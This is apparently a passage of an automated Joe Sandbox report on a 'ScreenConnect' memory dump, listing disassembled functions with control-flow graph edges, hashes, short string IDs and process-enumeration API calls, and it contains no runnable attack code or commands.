                                                                                                                                                                                                                                                                          • Instruction ID: 5b6870d5d46dfaf37c84a2ed7c41b835d79cd097406fc7684c646d968d4995b3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9010ff0b5931c1a00bfced98e918f35afcbac338babfb8ea11cf68c210df7e9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75616F31F042198BDB55EBA9C4906EFBAE2EFC9700F2481A9D406BB385DF349D468791
                                                                                                                                                                                                                                                                          Function 00BA4C6C Relevance: 2.6, Strings: 2, Instructions: 107COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 193 ba4c6c-ba4cb3 198 ba4d02-ba4d08 193->198 199 ba4cb5-ba4cc4 call ba4848 193->199 202 ba4d09-ba4dd8 199->202 203 ba4cc6-ba4ccb 199->203 209 ba4dda-ba4de0 202->209 210 ba4de1-ba4e24 202->210 216 ba4cce call ba52f8 203->216 217 ba4cce call ba52e8 203->217 205 ba4cd4 205->198 209->210 214 ba4e2b-ba4e32 210->214 215 ba4e26 210->215 215->214 216->205 217->205
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: `Qjq$`Qjq
                                                                                                                                                                                                                                                                          • API String ID: 0-374821722
                                                                                                                                                                                                                                                                          • Opcode ID: d7b27996639acc5a635257232a47a97d5beb11ea99966cb460972ce2610df937
                                                                                                                                                                                                                                                                          • Instruction ID: 6b71c0e73d2fa6b4b2994aa6c675b54477b2300e8a03ace5bad084b247badcbe
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7b27996639acc5a635257232a47a97d5beb11ea99966cb460972ce2610df937
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF419D71A043189FDB509F69C804BAEBBB9FB85310F1084E9D509A7290DBB45E54CF92
                                                                                                                                                                                                                                                                          Function 00BA5410 Relevance: 2.5, Strings: 2, Instructions: 16COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 218 ba5410-ba541b 219 ba5421-ba5423 218->219 220 ba543b-ba543c 219->220 221 ba5425-ba542b 219->221 222 ba542f-ba5431 221->222 223 ba542d 221->223 222->220 223->220
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: $jq$$jq
                                                                                                                                                                                                                                                                          • API String ID: 0-3720491408
                                                                                                                                                                                                                                                                          • Opcode ID: 0c9f9e18c54fac98b597eb6b97ac1c1f4d5e9e34146407572204440bd9c0b2a1
                                                                                                                                                                                                                                                                          • Instruction ID: 83b35875e11babb0185ea109d0fae6ec95c7fd477dffd32fb5b0830647b3d9d6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c9f9e18c54fac98b597eb6b97ac1c1f4d5e9e34146407572204440bd9c0b2a1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31D05E303846088F8638CE29D54091233E9FF4E7113A100E9D9058B379CE30EC81CA55
                                                                                                                                                                                                                                                                          Function 05554708 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 224 5554708-555471d 225 5554732-5554739 224->225 226 555471f-5554722 224->226 227 555473e-5554782 call 55527cc 225->227 228 55547ec-5554800 226->228 229 5554728-5554731 226->229 248 5554787-555478c 227->248 230 55547c6-55547cf 228->230 231 5554802 228->231 233 55547d1-55547eb 230->233 234 555482c-555488e 230->234 235 555480e-5554817 231->235 239 5554890-5554898 234->239 240 555489a-55548d0 K32EnumProcesses 234->240 239->240 242 55548d2-55548d8 240->242 243 55548d9-5554901 240->243 242->243 249 5554792-5554795 248->249 250 5554818-5554825 248->250 251 5554804-5554809 249->251 252 5554797-55547c4 249->252 250->234 251->227 252->230 252->235
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3291313206.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_5550000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 55274808fb2e0ad9cafd1d9eac20fc5db77aa7b8ae32d2e8e036b7105b75a966
                                                                                                                                                                                                                                                                          • Instruction ID: cb354e7450329699a4053bda524885330b815fa5a67c306a9f225f2345afca6c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55274808fb2e0ad9cafd1d9eac20fc5db77aa7b8ae32d2e8e036b7105b75a966
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2517F71A006058FCB24CFA9D990AAEBBF5FF88320F14892ED45AD7651D734E945CBA0
                                                                                                                                                                                                                                                                          Function 00BAFB40 Relevance: 1.6, Strings: 1, Instructions: 316COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 257 bafb40-bafb87 call ba7390 * 2 262 bafbba-bafbbe 257->262 263 bafb89-bafbb4 257->263 264 bafbc0-bafbeb 262->264 265 bafbf1-bafbf5 262->265 263->262 264->265 266 bafc0b-bafc0f 265->266 267 bafbf7-bafc05 265->267 270 bafc3b-bafccd 266->270 271 bafc11-bafc35 266->271 267->266 276 bafccf-bafcfc 270->276 277 bafd02-bafd06 270->277 271->270 276->277 279 bafd08-bafd1c 277->279 280 bafd22-bafd26 277->280 279->280 282 bafd28-bafd3c 280->282 283 bafd42-bafd46 280->283 282->283 284 bafd48-bafd5c 283->284 285 bafd62-bafd66 283->285 284->285 288 bafd68-bafd76 285->288 289 bafd7c-bafd80 285->289 288->289 291 bafd82-bafd90 289->291 292 bafd96-bafd9a 289->292 291->292 293 bafd9c-bafdaa 292->293 294 bafdb0-bafdb4 292->294 293->294 295 bafdca-bafdce 294->295 296 bafdb6-bafdc4 294->296 297 bafdd0-bafdfb 295->297 298 bafe01-bafe05 295->298 296->295 297->298 299 bafe51-bafe58 298->299 300 bafe07-bafe15 298->300 300->299 302 bafe17 300->302 303 bafe1a-bafe1f 302->303 305 bafe59-bafed9 call ba74f8 303->305 306 bafe21-bafe32 303->306 319 bafedb-bafef1 305->319 320 baff1c-baff1d 305->320 307 bafe3d-bafe4f 306->307 308 bafe34-bafe37 306->308 307->299 307->303 308->307 323 bafefa-baff1a 319->323 324 bafef3 319->324 321 baff28-baff2d 320->321 323->320 324->323
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                          • Opcode ID: a967786782fd3df8aae8fa965d2a25f0f541778ebabc316a70b6469519c8ea90
                                                                                                                                                                                                                                                                          • Instruction ID: 32c59e0ef2461aa0853c75fc06a92eb27f82d32dcfc47771f8754be5d3b0ae10
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a967786782fd3df8aae8fa965d2a25f0f541778ebabc316a70b6469519c8ea90
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0ED16174A00705CFCB45DFA8C894A9AB7F5FF49310B1186A9E919AB365DB30EC85CF80
                                                                                                                                                                                                                                                                          Function 055527CC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 327 55527cc-555488e 329 5554890-5554898 327->329 330 555489a-55548d0 K32EnumProcesses 327->330 329->330 331 55548d2-55548d8 330->331 332 55548d9-5554901 330->332 331->332
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 055548BD
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3291313206.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_5550000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: EnumProcesses
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 84517404-0
                                                                                                                                                                                                                                                                          • Opcode ID: f07fbdacd7c1528269663362444a1a6fd8a828f0fe2c134cf7211e64a9626b37
                                                                                                                                                                                                                                                                          • Instruction ID: d273acb4e05b477a8b81d9570ef731705b2e701837ecc829dda794e6be14caf8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f07fbdacd7c1528269663362444a1a6fd8a828f0fe2c134cf7211e64a9626b37
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 182116B5900249DFDB10CF9AC884ADEBBF4FB48320F10842ED919A7200C7389941CBA4
                                                                                                                                                                                                                                                                          Function 05554938 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 341 5554938-555493b 342 5554940-55549b1 ProcessIdToSessionId 341->342 343 55549b3-55549b9 342->343 344 55549ba-55549e2 342->344 343->344
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 0555499E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3291313206.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_5550000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ProcessSession
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3779259828-0
                                                                                                                                                                                                                                                                          • Opcode ID: f98d9fcb8faeeca31bafcef1507c279e2e762e5fad2a85eaf52c0cdb4774cae1
                                                                                                                                                                                                                                                                          • Instruction ID: c00c678affda43d2d14eac2eac4cb4f12961b151561efb4a5ef056f09468f7c0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f98d9fcb8faeeca31bafcef1507c279e2e762e5fad2a85eaf52c0cdb4774cae1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 691103B18002499FCB10DF9AD4457DEBBF4FB48320F14842AD858B7240C778A545CFA1
                                                                                                                                                                                                                                                                          Function 055527C0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 335 55527c0-55549b1 ProcessIdToSessionId 337 55549b3-55549b9 335->337 338 55549ba-55549e2 335->338 337->338
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 0555499E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3291313206.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_5550000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ProcessSession
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3779259828-0
                                                                                                                                                                                                                                                                          • Opcode ID: c4e8fbed148716395628ec523f12b0d69436d9bfe1d5b8639fae9475985405a6
                                                                                                                                                                                                                                                                          • Instruction ID: 5baa1969c6206b30fa999f00e15e1e829b5af09e2f9186640b42c60644c66bb5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4e8fbed148716395628ec523f12b0d69436d9bfe1d5b8639fae9475985405a6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE1103B1800249CFCB20DF9AC4457AEBBF4FB48320F14842AD859A7240D778A944CFA5
                                                                                                                                                                                                                                                                          Function 00BA8D98 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 347 ba8d98-ba8db8 349 ba8dba-ba8ddb 347->349 350 ba8de2-ba8df1 347->350 349->350 351 ba8dfd-ba8e0a 350->351 352 ba8df3 350->352 355 ba8ede-ba8ef2 351->355 356 ba8e10-ba8e1f 351->356 352->351 360 ba8efe-ba8f21 355->360 361 ba8ef4 355->361 358 ba8e2b-ba8e37 356->358 359 ba8e21 356->359 365 ba8e39-ba8e48 358->365 366 ba8e70-ba8e7f 358->366 359->358 372 ba8f2d-ba8f37 360->372 373 ba8f23 360->373 361->360 370 ba8e4a 365->370 371 ba8e54-ba8e6f 365->371 367 ba8e8b-ba8eb2 366->367 368 ba8e81 366->368 379 ba8ebe-ba8edd 367->379 380 ba8eb4 367->380 368->367 370->371 393 ba8f3a call ba90a8 372->393 394 ba8f3a call ba9098 372->394 373->372 380->379 381 ba8f40-ba8f42 382 ba8f88-ba8fa1 381->382 383 ba8f44-ba8f53 381->383 388 ba8fac 382->388 389 ba8fa3 382->389 386 ba8f5f-ba8f86 383->386 387 ba8f55 383->387 386->382 386->383 387->386 389->388 393->381 394->381
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: (nq
                                                                                                                                                                                                                                                                          • API String ID: 0-2756854522
                                                                                                                                                                                                                                                                          • Opcode ID: c5c822e337d254b017eec8c230821dd1c7fda878688e26187ce2e0190bd103fd
                                                                                                                                                                                                                                                                          • Instruction ID: 57709eae6f2d633deca35348ea0f9ea39ab93be53f413b4581617b62fc9777f0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5c822e337d254b017eec8c230821dd1c7fda878688e26187ce2e0190bd103fd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7661E534B106099FDB14DF68D894A9EB7F6FF8A714B1481A8E5069B365DB30EC02DB80
                                                                                                                                                                                                                                                                          Function 00BAAAA0 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 395 baaaa0-baaad0 398 baaade 395->398 399 baaad2-baaadc 395->399 400 baaae3-baaae5 398->400 399->400 401 baaaf1-baab12 400->401 402 baaae7-baaaf0 400->402 405 baab27-baab3c 401->405 406 baab14-baab25 401->406 409 baab42-baab61 405->409 410 baabf6-baac3f 405->410 406->405 413 baabec-baabf5 409->413 414 baab67-baab6d 409->414 419 baac41-baac43 410->419 420 baac45 410->420 414->410 416 baab73-baab8c 414->416 416->410 421 baab8e-baabaa 416->421 422 baac48-baac86 419->422 420->422 421->410 425 baabac 421->425 437 baad8a-baad9d 422->437 438 baac8c-baac98 422->438 427 baabb5-baabbc 425->427 429 baabbe-baabc2 427->429 430 baabcf 427->430 429->410 431 baabc4-baabcd 429->431 432 baabd1-baabe6 430->432 431->432 432->413 432->414 439 baad9f-baada3 437->439 443 baac9e-baaca9 438->443 444 baad43-baad5c 438->444 441 baadae 439->441 442 baada5 439->442 445 baadaf 441->445 442->441 448 baacab-baacbe 443->448 449 baacc3-baace2 443->449 452 baad69 444->452 453 baad5e-baad67 444->453 445->445 448->439 460 baacfc-baad13 449->460 461 baace4-baacf7 449->461 454 baad6e-baad72 452->454 453->454 457 baad79-baad84 454->457 457->437 457->438 464 baad2b-baad41 460->464 465 baad15-baad28 460->465 461->439 464->457 465->464
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: LRjq
                                                                                                                                                                                                                                                                          • API String ID: 0-665714880
                                                                                                                                                                                                                                                                          • Opcode ID: d0b2ea49bceef4337eb99329a72b476c71c38932ea6365460fb9c7eebcc2a5c8
                                                                                                                                                                                                                                                                          • Instruction ID: 6a05fce5d1a2793ac5f3c1b2bd9740dc3a1ecf7f1a785e28383a5f0ac78eb096
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0b2ea49bceef4337eb99329a72b476c71c38932ea6365460fb9c7eebcc2a5c8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6510430B042118FDB259F64D95476FBBF2EF86711F1485AEE846DB2A1DB309C44CBA2
                                                                                                                                                                                                                                                                          Function 00BAC6F1 Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 469 bac6f1-bac726 470 bac72c-bac744 469->470 471 baca57-baca5e 469->471 474 bac766-bac781 470->474 475 bac746-bac761 470->475 531 bac786 call bacbb0 474->531 532 bac786 call bacbc0 474->532 480 bac80e-bac823 call baf950 475->480 484 baca2b-baca3e 480->484 485 bac829-bac83f call ba5c2c 480->485 481 bac78c-bac7d7 call baed38 495 bac7da-bac800 481->495 486 baca45-baca49 484->486 492 bac841-bac847 485->492 493 bac857-bac880 485->493 490 baca4b 486->490 491 baca54-baca55 486->491 490->491 491->471 496 bac84b-bac84d 492->496 497 bac849 492->497 493->484 502 bac886-bac88c 493->502 503 bac80b 495->503 504 bac802 495->504 496->493 497->493 505 bac892-bac8a9 502->505 506 baca40 502->506 503->480 504->503 505->506 508 bac8af-bac8d3 505->508 506->486 511 bac8d9-bac972 call baaab0 call bab5a8 508->511 512 baca1e-baca25 508->512 511->484 519 bac978-bac986 511->519 512->484 512->502 521 bac988-bac9ac 519->521 522 bac9b1-bac9f1 call bafa08 519->522 521->486 528 bac9fa-baca1c call ba5c3c 522->528 528->486 531->481 532->481
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: $jq
                                                                                                                                                                                                                                                                          • API String ID: 0-2886413773
                                                                                                                                                                                                                                                                          • Opcode ID: e123e27dfdfda0adb295506a363fcb561522638d9f2ead73478a120a5627a2a6
                                                                                                                                                                                                                                                                          • Instruction ID: f1586be404575686af9d3b474442436c01a32885ccd49014fc9bf9d9c2fef2c2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e123e27dfdfda0adb295506a363fcb561522638d9f2ead73478a120a5627a2a6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A515E30A14719CFCB14EFA4C554AAEBBF2FF45300F1185ADD4166B269EB749D85CB80
                                                                                                                                                                                                                                                                          Function 00BA6FB0 Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 536 ba6fb0-ba6fb8 538 ba6fba 536->538 539 ba6f86 536->539 540 ba6fbf 538->540 541 ba6fbc-ba6fbe 538->541 542 ba6fc1-ba6fca 540->542 541->540 543 ba6fcf 542->543 544 ba6fcc 542->544 545 ba6fd1 543->545 546 ba6fd4-ba6fd5 543->546 544->543 545->546 546->542 547 ba6fd7-ba6ff5 546->547 550 ba7073-ba7089 547->550 551 ba6ff7-ba7041 547->551 554 ba708b-ba709f 550->554 555 ba70c5-ba70d2 550->555 575 ba7048-ba7071 551->575 561 ba70a8-ba70c3 554->561 562 ba70a1 554->562 557 ba70d4-ba70ea 555->557 558 ba7115-ba7131 555->558 565 ba70ec 557->565 566 ba70f3-ba7113 557->566 579 ba7133 call ba7e50 558->579 580 ba7133 call ba7e40 558->580 561->555 562->561 565->566 566->558 573 ba7139-ba7142 575->550 579->573 580->573
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                          • API String ID: 0-1334834377
                                                                                                                                                                                                                                                                          • Opcode ID: fc3a21c377e0fee96747bcfcc606c39385a71779796eac1f2238d59cdb86aff8
                                                                                                                                                                                                                                                                          • Instruction ID: 52dd7ed2839b960929fe38b1b2a0f627bfa3b9396eb1901199b0775399616d1a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc3a21c377e0fee96747bcfcc606c39385a71779796eac1f2238d59cdb86aff8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE411F71B182854FC719EB38A89096E7BEAEF8631071885BED815DB355EF34DD08C790
                                                                                                                                                                                                                                                                          Function 00BA5DC0 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 581 ba5dc0-ba5dc8 583 ba5dca-ba5dd3 581->583 584 ba5e16-ba5e4f call ba0420 581->584 583->584 592 ba5fda-ba5fe1 584->592 593 ba5e55-ba5e60 584->593 593->592 595 ba5e66-ba5e7d call ba59e0 593->595 598 ba5e7f-ba5e95 595->598 599 ba5ec0-ba5ecf 595->599 602 ba5e9e-ba5ebe 598->602 603 ba5e97 598->603 604 ba5edf-ba5ee8 599->604 605 ba5ed1-ba5edd 599->605 602->599 603->602 606 ba5eea-ba5f10 604->606 607 ba5f12-ba5f17 604->607 605->604 606->607 611 ba5f1f-ba5f35 607->611 617 ba5f37-ba5f5e 611->617 618 ba5fa5-ba5fbe 611->618 625 ba5f98-ba5fa3 617->625 626 ba5f60-ba5f87 617->626 621 ba5fc9 618->621 622 ba5fc0 618->622 621->592 622->621 625->617 625->618 626->625 631 ba5f89-ba5f96 626->631 631->618
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: `}q
                                                                                                                                                                                                                                                                          • API String ID: 0-649497449
                                                                                                                                                                                                                                                                          • Opcode ID: 9612ee51217110efa0a53e965d4e140eea94c7d69c4fe5c67fd95d2c1e766619
                                                                                                                                                                                                                                                                          • Instruction ID: 5aabc9402eb580116bcdaa53ebeb8f051c0536fd278dbaab53119f738c9486fc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9612ee51217110efa0a53e965d4e140eea94c7d69c4fe5c67fd95d2c1e766619
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22418C707146068FC764EB38D994A6E77E2EF89300B2484A9D906CB3A5EF35DE45CB80
                                                                                                                                                                                                                                                                          Function 00BA7E50 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: (nq
                                                                                                                                                                                                                                                                          • API String ID: 0-2756854522
                                                                                                                                                                                                                                                                          • Opcode ID: 24263d5acc181865a2cbb6cc3d6dbd3ae9f9b74a2fe7d759cea705248e2554fc
                                                                                                                                                                                                                                                                          • Instruction ID: 49581ad2a4894bbb3ec64dc0c6daf96708e15dcedb3a3ffb6de5a8c44c6349c0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24263d5acc181865a2cbb6cc3d6dbd3ae9f9b74a2fe7d759cea705248e2554fc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5841F531A48109CFCB15EF68D8946AEBBB6EF84301F18C5A9D8059B355DF35ED06CB90
                                                                                                                                                                                                                                                                          Function 00BA6FE8 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
